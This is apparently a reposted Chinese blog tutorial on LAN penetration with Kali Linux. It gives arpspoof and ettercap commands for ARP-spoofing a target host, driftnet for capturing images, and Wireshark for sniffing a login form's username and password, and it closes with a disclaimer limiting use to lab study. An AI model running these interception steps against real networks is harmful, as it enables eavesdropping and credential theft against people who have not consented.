kaliLinux内网渗透(一)-盗取用户账号信息

kaliLinux内网渗透(一)-盗取用户账号信息

一、Ifconfig 查看一下自己的ip地址以及网卡信息和子网掩码,我们这里是eth0网卡,自己的ip是192.168.1.109

二、接下来我们进行nmap内网扫描,我们选定192.168.1.101进行攻击。

三、内网转发数据包

arpspoof –i eth0 –t 192.168.1.1 192.168.1.101

四、截获数据包

ettercap –T –q –M ARP /192.168.1.109// ///

五、监听捕获图片

driftnet –I eth0

六、这样就满足了吗??当然不能!!!接着,我打开wireshark,我们测试的网址(我仅仅是举个例子测试一下,并无冒犯之意,希望大家不要用作非法用途):http://********1***8.cn

我(已经被攻击的设备)在这个网址里输入自己的用户名和密码,用户名:test,密码:123456,验证码:4455,都被我抓取到了。

写在最后,为了保护网络安全环境,请您在虚拟环境进行测试和学习,教程位渗透测试教学所示,任何人不得用于违法犯罪,否则与本公众号无关,安全上网,人人有责。

文字:whoami

排版:whoami

图片:whoami

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20180211G0319I00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券